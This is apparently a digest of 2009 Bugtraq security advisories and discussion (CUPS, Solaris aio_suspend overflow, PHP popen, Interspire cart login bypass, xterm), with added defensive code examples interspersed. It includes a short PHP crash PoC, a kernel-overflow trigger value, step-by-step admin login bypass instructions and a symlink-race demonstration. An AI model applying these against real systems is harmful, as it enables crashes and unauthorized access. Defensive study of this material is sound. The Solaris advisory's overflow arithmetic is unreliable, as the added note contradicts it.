
===========================================================
Ubuntu Security Notice USN-707-1           January 12, 2009
cups, cupsys vulnerabilities
CVE-2008-5183, CVE-2008-5184, CVE-2008-5286, CVE-2008-5377
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  cupsys                          1.2.2-0ubuntu0.6.06.12

Ubuntu 7.10:
  cupsys                          1.3.2-1ubuntu7.9

Ubuntu 8.04 LTS:
  cupsys                          1.3.7-1ubuntu3.3

Ubuntu 8.10:
  cups                            1.3.9-2ubuntu6.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that CUPS didn't properly handle adding a large number of RSS
subscriptions. A local user could exploit this and cause CUPS to crash, leading
to a denial of service. This issue only applied to Ubuntu 7.10, 8.04 LTS and
8.10. (CVE-2008-5183)

It was discovered that CUPS did not authenticate users when adding and
cancelling RSS subscriptions. An unprivileged local user could bypass intended
restrictions and add a large number of RSS subscriptions. This issue only
applied to Ubuntu 7.10 and 8.04 LTS. (CVE-2008-5184)

It was discovered that the PNG filter in CUPS did not properly handle certain
malformed images. If a user or automated system were tricked into opening a
crafted PNG image file, a remote attacker could cause a denial of service or
execute arbitrary code with user privileges. In Ubuntu 7.10, 8.04 LTS, and 8.10,
attackers would be isolated by the AppArmor CUPS profile. (CVE-2008-5286)

It was discovered that the example pstopdf CUPS filter created log files in an
insecure way. Local users could exploit a race condition to create or overwrite
files with the privileges of the user invoking the program. This issue only
applied to Ubuntu 6.06 LTS, 7.10, and 8.04 LTS. (CVE-2008-5377)
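The insecure log-file pattern described for CVE-2008-5377, shown next to two hardened forms. This is an added example, not code from the advisory or from CUPS; the log name `filter.log`, the scratch directories and the pre-planted link are constructed, since the advisory does not give the real path.

```shell
#!/bin/sh
# Added illustration: every path is constructed and lives in a private
# scratch directory. "filter.log" is a placeholder name.

# Insecure: fixed, predictable log name in a directory other users can
# write to. The redirect follows whatever already sits at that path.
log_insecure() {
    echo "$2" > "$1/filter.log"
}

# Hardened (1): let mktemp pick an unpredictable name. It creates the
# file exclusively (mode 0600) and never reuses an existing path.
log_hardened() {
    logfile=$(mktemp "$1/filter.log.XXXXXX") || return 1
    echo "$2" > "$logfile"
    printf '%s\n' "$logfile"
}

# Hardened (2): when the name must stay fixed, noclobber (set -C) makes
# the redirect fail instead of writing through an existing file or a
# link to one.
log_fixed_path() {
    ( set -C; echo "$2" > "$1/filter.log" ) 2>/dev/null
}

# Runs all three variants against the same constructed precondition and
# reports what happened to the file the link points at.
run_demo() {
    scratch=$(mktemp -d) || return 1
    mkdir "$scratch/shared" "$scratch/home"
    victim="$scratch/home/victim.txt"
    echo "important data" > "$victim"

    # Constructed precondition: a link already exists at the predictable
    # log path before the filter runs.
    ln -s "$victim" "$scratch/shared/filter.log"

    log_insecure "$scratch/shared" "debug output"
    if [ "$(cat "$victim")" = "important data" ]; then
        insecure=intact
    else
        insecure=clobbered
    fi

    echo "important data" > "$victim"    # reset for the next variant

    hardened=clobbered
    if newlog=$(log_hardened "$scratch/shared" "debug output"); then
        if [ -f "$newlog" ] && [ ! -L "$newlog" ] \
           && [ "$(cat "$newlog")" = "debug output" ] \
           && [ "$(cat "$victim")" = "important data" ]; then
            hardened=intact
        fi
    fi

    if log_fixed_path "$scratch/shared" "debug output"; then
        fixed=written
    else
        fixed=refused
    fi

    rm -rf "$scratch"
    echo "insecure=$insecure hardened=$hardened fixed_path=$fixed"
}

run_demo
```

On current Linux kernels the `fs.protected_symlinks` sysctl also blocks this kind of link-following in sticky world-writable directories, but the script-level fix is still needed everywhere else.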






From: "Integrigy Alerts" <alerts@integrigy.com>
To: <bugtraq@securityfocus.com>
Cc: "'security curmudgeon'" <jericho@attrition.org>
Subject: RE: Oracle Database Buffer Overflow in SYS.KUPF$FILE_INT.GET_FULL_FILENAME (Oracle CPU April 2008 DB11)
Date: Mon, 12 Jan 2009 10:29:04 -0600

The main problem with the Oracle CVSS base scores is more with CVSS than
Oracle.  Under the CVSSv2 definition of
Confidentiality/Integrity/Availability impact, if the entire database is
compromised but not the "entire system" then the metric value will be
Partial rather than Complete.  Since the large majority of Oracle database
vulnerabilities require a valid database session unless exploited via a
blended threat (i.e., such as SQL injection which is completely ignored by
Oracle in any analysis), the maximum realistic score for an Oracle database
vulnerability is 6.5 since CIA impact will only ever be Partial except in
rare occasions.  Oracle does include a "Partial+" in the advisories to
indicate where the entire database is compromised.  The CVSS definitions
around system vs. service vs. application should be strengthened in a future
version.

Additional information on the Oracle CVSS scores is at
http://www.integrigy.com/oracle-security-blog/archive/2006/10/27/oracle-cvss

Regarding the quality of information released by Oracle in the CPU
advisories,  I can easily understand why there are discrepancies between a
researcher's advisory and Oracle's.  Having worked with Oracle on over 50
vulnerabilities, my experience is that the Oracle security team generally
does not spend much effort to fully research, validate, and explore each
vulnerability.  Rather the focus is on confirming the vulnerability and
coordinating with development to fix the vulnerability as qualified and
documented by the security researcher.  If the researcher does not provide
full details or does not document a specific attack vector, then Oracle
probably won't include this in the fix or advisory.  This has resulted in a
few well publicized cases where the same vulnerability had to be fixed
multiple times since Oracle only fixed the bug based on the exact exploit
details/code provided by the security researcher.

-----Original Message-----
From: Joxean Koret [mailto:joxeankoret@yahoo.es] 
Sent: Saturday, January 10, 2009 12:27 PM
To: security curmudgeon
Cc: Team SHATTER; bugtraq@securityfocus.com; secalert_us@oracle.com
Subject: Re: Team SHATTER Security Advisory: Oracle Database Buffer Overflow
in SYS.KUPF$FILE_INT.GET_FULL_FILENAME (DB11)

Hi,

This is very typical and, in my opinion, you should only consider
trustworthy the Team Shatter's advisory, not the Oracle's one.

Take for example the bug APPS01[1] in Oracle Critical Patch Update of
April 2007 [2], it was a preauthenticated remote bug (with remote I mean
"from internet", not from "adjacent network"). CVSS2 Score would be 9/10
(calculate it yourself [3]), however, the Oracle advisory says that a
"Valid session" was needed and that the CVSS2 score was 4.2. It's funny.

>As a responsible security professional, I have to assume their research
>is accurate and their advisory should be taken more seriously than
>Oracle's.

Yes, don't trust the Oracle's advisories, they aren't real.

[1] http://www.zerodayinitiative.com/advisories/ZDI-08-088
[2] http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html
[3] http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

Thanks,
Joxean Koret

On Sat, 2009-01-10 at 11:11 +0000, security curmudgeon wrote:

> Summary: Team SHATTER says this is a remote overflow that allows for the
> execution of arbitrary code (CVSS2 9.0). Oracle says this is a limited
> DoS condition (CVSS2 4.0). That is a big discrepancy.
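
The score arithmetic behind the figures quoted in this thread, as an added example that is not part of either message: a CVSS v2 base-score calculation using the weights from the CVSS v2 specification. The three vectors in main() are assumptions chosen to reproduce the 6.5, 9.0 and 4.0 figures; the posts give scores, not vectors.

```c
#include <stdio.h>
#include <string.h>

/* CVSS v2 weight for one metric value; -1.0 if the value is not defined. */
static double weight(const char *metric, char v)
{
    if (strcmp(metric, "AV") == 0)   /* Access Vector */
        return v == 'L' ? 0.395 : v == 'A' ? 0.646 : v == 'N' ? 1.0 : -1.0;
    if (strcmp(metric, "AC") == 0)   /* Access Complexity */
        return v == 'H' ? 0.35 : v == 'M' ? 0.61 : v == 'L' ? 0.71 : -1.0;
    if (strcmp(metric, "Au") == 0)   /* Authentication */
        return v == 'M' ? 0.45 : v == 'S' ? 0.56 : v == 'N' ? 0.704 : -1.0;
    /* C, I and A share one table: None / Partial / Complete */
    return v == 'N' ? 0.0 : v == 'P' ? 0.275 : v == 'C' ? 0.660 : -1.0;
}

/*
 * Parse a base vector such as "AV:N/AC:L/Au:S/C:P/I:P/A:P" and return the
 * base score in tenths (65 means 6.5), or -1 if the vector is malformed.
 */
int cvss2_base_tenths(const char *vector)
{
    static const char *order[6] = { "AV", "AC", "Au", "C", "I", "A" };
    double w[6];
    const char *p = vector;

    for (int i = 0; i < 6; i++) {
        size_t n = strlen(order[i]);
        if (strncmp(p, order[i], n) != 0 || p[n] != ':')
            return -1;
        w[i] = weight(order[i], p[n + 1]);
        if (w[i] < 0.0)
            return -1;
        p += n + 2;
        if (i < 5) {
            if (*p != '/')
                return -1;
            p++;
        }
    }
    if (*p != '\0')
        return -1;

    double impact = 10.41 * (1.0 - (1.0 - w[3]) * (1.0 - w[4]) * (1.0 - w[5]));
    double exploitability = 20.0 * w[0] * w[1] * w[2];
    double f = (impact == 0.0) ? 0.0 : 1.176;
    double base = (0.6 * impact + 0.4 * exploitability - 1.5) * f;

    return (int)(base * 10.0 + 0.5);   /* round to one decimal place */
}

int main(void)
{
    /* Assumed vectors: network access, low complexity, one authentication. */
    const char *vectors[] = {
        "AV:N/AC:L/Au:S/C:P/I:P/A:P",   /* all impacts Partial  */
        "AV:N/AC:L/Au:S/C:C/I:C/A:C",   /* all impacts Complete */
        "AV:N/AC:L/Au:S/C:N/I:N/A:P",   /* availability only    */
    };
    for (size_t i = 0; i < sizeof vectors / sizeof vectors[0]; i++) {
        int t = cvss2_base_tenths(vectors[i]);
        printf("%-28s %d.%d\n", vectors[i], t / 10, t % 10);
    }
    return 0;
}
```

With authentication required, moving all three impact metrics from Partial to Complete is the whole difference between 6.5 and 9.0.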



Date: Mon, 12 Jan 2009 12:30:15 +0100
From: SmoKe <smokepower@gmail.com>
To: bugtraq@securityfocus.com
Subject: Hack Aethra SV 1042 Adsl/Voip Router

Hi,

with the blue serial cable (console cable) and Advanced Serial Port Monitor
(http://www.aggsoft.com/serial-port-monitor.htm)
you can retrieve the admin password of this router without reset or re-firmware....


Hack Aethra SV 1042 Adsl/Voip Router

Mod: AETHRA STARVOICE SV 1042

Boot Version: 1.8.0.0
Boot Date: 25/02/2004 12:12
ATOS Version: 2.0.25  (0@unknow)
ATOS Date: 26/10/2004 11:04
StarVoice version: 1.4.18
StarVoice model: SV1042
Les version: 1.4.12

Exploit:      Local

Vendor contacted 6 months ago, Aethra has made a patch and informed all clients.

youtube

http://it.youtube.com/watch?v=_WK4KQJ8wVo

full

http://www.adrive.com/public/bb1b031b4b3ea243d7f61fcad55f57634e0c882356619b6e1cd538623e6969f5.html

bye


SmoKe

Date: Sun, 11 Jan 2009 17:49:13 +0100
From: Tobias Klein <tk@trapkit.de>
To: bugtraq@securityfocus.com
Subject: [TKADV2009-001] Sun Solaris aio_suspend() Kernel Integer Overflow Vulnerability

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2009-001.txt

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:               Sun Solaris aio_suspend() Kernel Integer 
                        Overflow Vulnerability
Advisory ID:            TKADV2009-001
Revision:               1.0 
Release Date:           2009/01/08 
Last Modified:          2009/01/08
Date Reported:          2008/09/15
Author:                 Tobias Klein (tk at trapkit.de)
Affected Software:      Solaris  8 without patch 117350-59 (SPARC)
                        Solaris  9 without patch 138577-01 (SPARC)
                        Solaris 10 without patch 121394-02 (SPARC)
                        Solaris  8 without patch 117351-59 (x86)
                        Solaris  9 without patch 138578-01 (x86)
                        Solaris 10 without patch 121395-02 (x86)
                        OpenSolaris < build TBC (SPARC and x86)  
Remotely Exploitable:   No
Locally Exploitable:    Yes 
Vendor URL:             http://www.sun.com/ 
Vendor Status:          Vendor has released an updated version
Patch development time: 115 days


======================
Vulnerability Details:
======================
The kernel of Solaris contains a vulnerability in the code that handles 
SYS_kaio syscall requests on systems in 32 bit mode. Exploitation of this 
vulnerability can result in local denial of service attacks (system crash 
due to a kernel panic). As all Solaris Zones (Containers) share the same 
kernel it is possible to crash the whole system (all Zones) even if the 
vulnerability is triggered in an unprivileged non-global zone.

This kernel vulnerability can be exploited by an unprivileged local user.


==================
Technical Details:
==================
The following source code references are based on the kernel source code 
available from http://www.opensolaris.org.

Source code file: /uts/common/os/aio.c

[..]
221 static int64_t
222 kaioc(
223        long  a0,
224        long  a1,
225        long  a2,
226        long  a3,
227        long  a4,
228        long  a5)
229 {
230        int  error;
231        long rval = 0;
232
233        switch ((int)a0 & ~AIO_POLL_BIT) {
...
266        case AIOSUSPEND:
267 [1]        error = aiosuspend((void *)a1, (int)a2, (timespec_t *)a3,
268                (int)a4, &rval, AIO_64);
269            break;
[..]

[1] The parameters "a1", "a2", "a3" and "a4" of the "aiosuspend()" function
    are user controlled.

Source code file: /uts/common/os/aio.c

[..]
897   static int
898   aiosuspend(
899          void   *aiocb,
900          int    nent,
901          struct timespec   *timout,
902          int    flag,
903          long   *rval,
904          int    run_mode)
905   {
...
925        aiop = curproc->p_aio;
926 [2]    if (aiop == NULL || nent <= 0)
927               return (EINVAL);
...
951        if (model == DATAMODEL_NATIVE)
952 [3]           ssize = (sizeof (aiocb_t *) * nent);
953      #ifdef _SYSCALL32_IMPL
954        else
955 [3]           ssize = (sizeof (caddr32_t) * nent);
956      #endif  /* _SYSCALL32_IMPL */
957 
958 [4]    cbplist = kmem_alloc(ssize, KM_NOSLEEP);
[..]

[2] As "nent" is controlled by the user this check can be passed if 
    "nent" > 0.
[3] The value of "ssize" is calculated using the user controlled value of 
    "nent". By supplying a value of 0x3fffffff for "nent" an integer 
    overflow will happen that results in "ssize" = 0x00000000. The 
    "kmem_alloc()" function is now called with a length value of 
    0x00000000 (see [4]). The "kmem_alloc()" function itself calls 
    "vmem_alloc()" with a "size" value of 0x00000000 which calls 
    "vmem_xalloc()" with the same "size" value.


Source code file: /lib/libumem/common/vmem.c

[..]
815 void *
816 vmem_xalloc(vmem_t *vmp, size_t size, size_t align, size_t phase,
817   size_t nocross, void *minaddr, void *maxaddr, int vmflag)
818 {
...
934 [6]  if (size == 0)
935         umem_panic("vmem_xalloc(): size == 0");
[..]

[6] If a "size" value of 0x00000000 is supplied to the "vmem_xalloc()" 
    function the kernel panics. This leads to a system crash (denial of 
    service).


=========
Solution:
=========
This issue is addressed in the following patch releases from Sun:

SPARC Platform
    - Solaris 8 with patch 117350-59 or later
    - Solaris 9 with patch 138577-01 or later
    - Solaris 10 with patch 121394-02 or later
    - OpenSolaris build TBC

x86 Platform
    - Solaris 8 with patch 117351-59 or later
    - Solaris 9 with patch 138578-01 or later
    - Solaris 10 with patch 121395-02 or later
    - Opensolaris build TBC


========
History:
========
  2008/09/15 - Vendor notified  
  2008/09/16 - Vendor confirms the vulnerability
  2009/01/08 - Public disclosure of vulnerability details by Sun 
  2009/01/08 - Release date of this security advisory


========
Credits:
========
  Vulnerability found and advisory written by Tobias Klein.


===========
References:
===========
  [1] http://sunsolve.sun.com/search/document.do?assetkey=1-66-247986-1
  [2] http://www.trapkit.de/advisories/TKADV2009-001.txt


========
Changes:
========
  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Public release


===========
Disclaimer:
===========
The information within this advisory may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are no warranties, implied or express, with regard
to this information. In no event shall the author be liable for any
direct or indirect damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this
information is at the user's own risk.


==================
PGP Signature Key:
==================
  http://www.trapkit.de/advisories/tk-advisories-signature-key.asc

  
Copyright 2009 Tobias Klein. All rights reserved.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG

iD8DBQFJaiEKkXxgcAIbhEERAi2vAKCz4kA50uoS0YZAR0XbfS2S2FbruACcCprB
FsiAvTxq5KXE6iNECznlbyA=P5+L
-----END PGP SIGNATURE-----

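
The size computation at [3] in the advisory above, modelled with a 32-bit size_t next to a checked variant, as an added example that is not taken from the advisory, the Solaris source or Sun's patch. The function names, the LIST_MAX_BYTES cap and the error codes are assumptions; with a 4-byte element the 32-bit product wraps to 0 once nent reaches 0x40000000.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed policy cap on the pointer list, in bytes (hypothetical value). */
#define LIST_MAX_BYTES (64u * 1024u)

/*
 * Unchecked computation as in the excerpt: ssize = sizeof(element) * nent,
 * with size_t modelled as a 32-bit unsigned integer.
 */
uint32_t ssize_unchecked(int32_t nent, uint32_t elem_size)
{
    return elem_size * (uint32_t)nent;   /* wraps modulo 2^32 */
}

/*
 * Checked computation. Rejects non-positive counts, products that would
 * wrap, and requests above the cap. On success *ssize is never 0, so an
 * allocator that refuses zero-length requests is never handed one.
 */
int ssize_checked(int32_t nent, uint32_t elem_size, uint32_t *ssize)
{
    if (nent <= 0 || elem_size == 0)
        return EINVAL;
    if ((uint32_t)nent > UINT32_MAX / elem_size)      /* product would wrap */
        return EOVERFLOW;
    if ((uint32_t)nent > LIST_MAX_BYTES / elem_size)  /* fits, but too large */
        return E2BIG;
    *ssize = elem_size * (uint32_t)nent;
    return 0;
}

int main(void)
{
    /* Constructed sample counts around the wrap boundary for 4-byte elements. */
    const int32_t samples[] = { 16, 0x3fffffff, 0x40000000, 0x40000001 };
    const uint32_t elem = 4;   /* pointer size in a 32-bit kernel */

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t checked = 0;
        int err = ssize_checked(samples[i], elem, &checked);
        printf("nent=0x%08x unchecked=0x%08x checked: err=%d ssize=0x%08x\n",
               (unsigned)samples[i],
               (unsigned)ssize_unchecked(samples[i], elem),
               err, (unsigned)checked);
    }
    return 0;
}
```

The nent <= 0 test at [2] cannot catch this on its own, because the count is positive and only the product is out of range.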

Date: 12 Jan 2009 13:36:37 -0000
From: ew1zz@hotmail.com
To: bugtraq@securityfocus.com
Subject: PHP Buffer Overflow(popen)

Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen func)

Type: Remote and Local

Requirements for exploit: popen() enabled.


By: e.wiZz!  Enes Mu�ić   ew1zz@hotmail.com


PHP Popen() function overview:

Popen function in php opens a pipe to a process executed by forking the command given by command.
It was implemented since PHP 4 version.
     popen ( string $command_to_execute , string $mode )

Second argument is vulnerable to buffer overflow. Reason why I mentioned Apache here is because
when we execute poc.php Apache HTTP server crashes without any report in error log. You can test on WAMP too, on CLI or browser.


Tested on: PHP 5.2.8/4.2.1/4.2.0
           Apache 2.2.11


PoC:


<?php
$____buff=str_repeat("A",9999);
$handle = popen('/whatever/', $____buff);
echo $handle;
?>

Date: Mon, 12 Jan 2009 21:57:42 +0700
From: Nam Nguyen <namn@bluemoon.com.vn>
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [BMSA-2009-01] Authentication bypass in Interspire Shopping Cart v4.0.1 and below
Organization: Blue Moon Consulting Co., Ltd

BLUE MOON SECURITY ADVISORY 2009-01
===================================


:Title: Authentication bypass in Interspire Shopping Cart
:Severity: Critical
:Reporter: Truong Van Tri and Blue Moon Consulting
:Products: Interspire Shopping Cart v4.0.1 Ultimate edition
:Fixed in: v4.0.2


Description
-----------

Interspire Shopping Cart (ISC) is ecommerce software that includes everything you need to start, run, promote and profit from your online store. It combines easy-to-customize store designs with marketing tools proven to significantly increase your sales.

In v4.0.1, ISC suffers from an authentication bypass problem. This allows anyone to login to ISC's control panel without knowing the administrator's password.

The problem is with ``class.auth.php``'s ``ProcessLogin`` function. This function sets a HTTPOnly cookie flag ``RememberToken`` too early in the process, even before the user is authenticated. A malicious user could force ``ProcessLogin`` to set this cookie by ticking on ``Remember me`` at the login page, entering a targeted username such as ``admin``, and anything as password. This first attempt will fail, but the cookie is already set, and ready to authenticate him/her to the control panel.

Blue Moon Consulting has verified the bug in version 4.0.1 Ultimate edition being showcased at http://www.interspire.com/shoppingcart/demo.php. It is highly likely that it also exists in older versions.

Workaround
----------

There is no workaround. Please apply the fix.

Fix
---

The problem has been fixed in v4.0.2.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

  January 07, 2009: Initial contact sent to customerservice@interspire.com and sales@interspire.com

:Vendor response:

  January 08, 2009: Chris Boulton requested further communications to be addressed to him directly.

:Further communication:

  January 08, 2009: Prepared advisory is sent to Chris and regular update is requested.

  January 08, 2009: Chris updated us with a proper fix.

  January 08, 2009: Mitchell Harper updated us with Interspire's notification to their customers.

  January 08, 2009: Mitchell and Chris requested us to hold off full disclosure in 6 weeks to allow time for Interspire customers to get patched.

  January 08, 2009: We agreed to hold it off till 4.0.2 was released.

  January 08, 2009: Draft advisory was sent to Chris and Mitchell.

  January 08, 2009: Chris clarified that 4.0.2 had been released to address the issue.

  January 12, 2009: Mitchell requested us not to include full details such as steps to reproduce the bug.

  January 12, 2009: We explained our disclosure policy again to Mitchell, and sent an updated advisory.

:Public disclosure: January 12, 2009

:Exploit code: No exploit code is needed.

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.


Date: Sun, 11 Jan 2009 22:48:23 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
To: bugtraq@securityfocus.com
Subject: [SECURITY] [DSA 1700-1] New lasso packages fix validation bypass

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1700-1                  security@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 11, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : lasso
Vulnerability  : incorrect API usage
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2009-0050
Debian Bug     : 511262

It was discovered that Lasso, a library for Liberty Alliance and SAML
protocols, performs incorrect validation of the return value of OpenSSL's
DSA_verify() function.

For the stable distribution (etch), this problem has been fixed in
version 0.6.5-3+etch1.

For the upcoming stable distribution (lenny) and the unstable
distribution (sid), this problem has been fixed in version 2.2.1-2.

We recommend that you upgrade your lasso package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

    Size/MD5 checksum:    96562 157be6e89308bfbf1bb53e30e4d0d8da
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_s390.deb
    Size/MD5 checksum:   175634 706adfdb4bc526064399360616de2007

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:   179674 09b871dbcaeaf3108bd6860c2fc81363
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:    88132 f2fd28ccab190a99e2398725e4fd8b90
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:   173448 5e1fa2fe243214d922308bf324da7e87
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:   170024 4b80b359d3a1150818c50d92eaa37c5b
  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:   181308 db23cb9d622527c4032d8a98865b828f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAklqaMQACgkQXm3vHE4uylo0/wCg55JaJ9uBKz7/6BHVxqFQr6qs
ggcAn0vx2xkAYwHnCNM0nCjwMW/bCgMW
=4obR
-----END PGP SIGNATURE-----

To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:005 ] xterm
Date: Sun, 11 Jan 2009 20:27:00 -0700
From: security@mandriva.com

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:005
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : xterm
 Date    : January 11, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been discovered in xterm, which can be exploited
 by malicious people to compromise a user's system. The vulnerability
 is caused due to xterm not properly processing the DECRQSS Device
 Control Request Status String escape sequence. This can be exploited
 to inject and execute arbitrary shell commands by e.g. tricking a
 user into displaying a malicious text file containing a specially
 crafted escape sequence via the more command in xterm (CVE-2008-2383).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________
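
 A pre-display check for the kind of file described above, as an added
 example that is not part of the Mandriva advisory or of xterm. The advisory
 names DECRQSS but not its framing; the scanner assumes the standard form
 DCS $ q ... ST (DCS is ESC P or 0x90, ST is ESC \ or 0x9c). The names
 find_dcs and neutralize and the sample bytes are constructed for this example.

```cpp
#include <cstddef>
#include <cstdio>
#include <string>
#include <vector>

// One Device Control String found in the input.
struct DcsHit {
    size_t offset;    // index of the DCS introducer
    size_t length;    // bytes up to and including ST, or to end of input
    bool decrqss;     // body starts with "$q" (a DECRQSS request)
    bool terminated;  // a String Terminator was found
};

static const unsigned char ESC = 0x1b, C1_DCS = 0x90, C1_ST = 0x9c;

// Length of a DCS introducer at position i, or 0 if there is none.
// The 8-bit form is optional because 0x90 is also a UTF-8 continuation byte.
static size_t dcs_intro_len(const std::string &d, size_t i, bool eight_bit) {
    unsigned char c = static_cast<unsigned char>(d[i]);
    if (c == ESC && i + 1 < d.size() && d[i + 1] == 'P') return 2;
    if (eight_bit && c == C1_DCS) return 1;
    return 0;
}

// Length of a String Terminator at position i, or 0 if there is none.
static size_t st_len(const std::string &d, size_t i, bool eight_bit) {
    unsigned char c = static_cast<unsigned char>(d[i]);
    if (c == ESC && i + 1 < d.size() && d[i + 1] == '\\') return 2;
    if (eight_bit && c == C1_ST) return 1;
    return 0;
}

// Reports every DCS sequence in the buffer, including unterminated ones.
std::vector<DcsHit> find_dcs(const std::string &d, bool eight_bit = false) {
    std::vector<DcsHit> hits;
    size_t i = 0;
    while (i < d.size()) {
        size_t intro = dcs_intro_len(d, i, eight_bit);
        if (intro == 0) { ++i; continue; }
        size_t body = i + intro, j = body, st = 0;
        while (j < d.size() && (st = st_len(d, j, eight_bit)) == 0) ++j;
        DcsHit h;
        h.offset = i;
        h.length = j + st - i;
        h.decrqss = d.compare(body, 2, "$q") == 0;
        h.terminated = st != 0;
        hits.push_back(h);
        i = j + st;  // always past the introducer, so the loop advances
    }
    return hits;
}

// Makes the text safe to print: ESC becomes "^[" and, when eight_bit is set,
// C1 control bytes become \xNN, so the terminal never sees a control sequence.
std::string neutralize(const std::string &d, bool eight_bit = false) {
    static const char hex[] = "0123456789abcdef";
    std::string out;
    for (size_t i = 0; i < d.size(); ++i) {
        unsigned char c = static_cast<unsigned char>(d[i]);
        if (c == ESC) {
            out += "^[";
        } else if (eight_bit && c >= 0x80 && c <= 0x9f) {
            out += "\\x";
            out += hex[c >> 4];
            out += hex[c & 15];
        } else {
            out += static_cast<char>(c);
        }
    }
    return out;
}

int main() {
    // Constructed sample: plain text around a harmless DECRQSS request.
    std::string sample = "notes\n\x1bP$qm\x1b\\tail\n";
    std::vector<DcsHit> hits = find_dcs(sample);
    for (size_t k = 0; k < hits.size(); ++k)
        std::printf("DCS at %zu, %zu bytes, decrqss=%d, terminated=%d\n",
                    hits[k].offset, hits[k].length,
                    hits[k].decrqss, hits[k].terminated);
    std::printf("%s", neutralize(sample).c_str());
    return 0;
}
```

 Printing untrusted files through a filter of this kind (or with cat -v)
 keeps the sequence out of the terminal regardless of the xterm version.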

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2383
 _______________________________________________________________________

 Updated Packages:

 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

Date: Mon, 12 Jan 2009 18:04:38 +0800
From: "organiser@syscan.org" <organiser@syscan.org>
To: dailydave <dailydave@lists.immunitysec.com>,
bugtraq@securityfocus.com, oss-security@lists.openwall.com,
focus-ids@securityfocus.com, webappsec@securityfocus.org,
isn@infosecnews.org, honeypots@securityfocus.com,
incidents@securityfocus.com, Focus-Linux@securityfocus.com,
pen-test@securityfocus.com, security-basics@securityfocus.com,
security-announce@globus.org, linux-security@redhat.com,
sectool-list@redhat.com, compsci@lists.free.net.ph
Cc: "organiser@syscan.org" <organiser@syscan.org>
Subject: SyScan'09 Call For Paper - Shanghai, Hong Kong, Singapore, Taipei

*SyScan'09 CALL FOR PAPERS/TRAINING*

*ABOUT SYSCAN'09*
This year, SyScan'09 will be held in the 4 exciting cities of Singapore, 
Shanghai, Taipei and Hong Kong. Details are as follows:

*SyScan'09 Shanghai*
date: 13, 14 May 2009
venue: Ramada Plaza Hotel Shanghai

*SyScan'09 Hong Kong*
date: 19, 20 May 2009
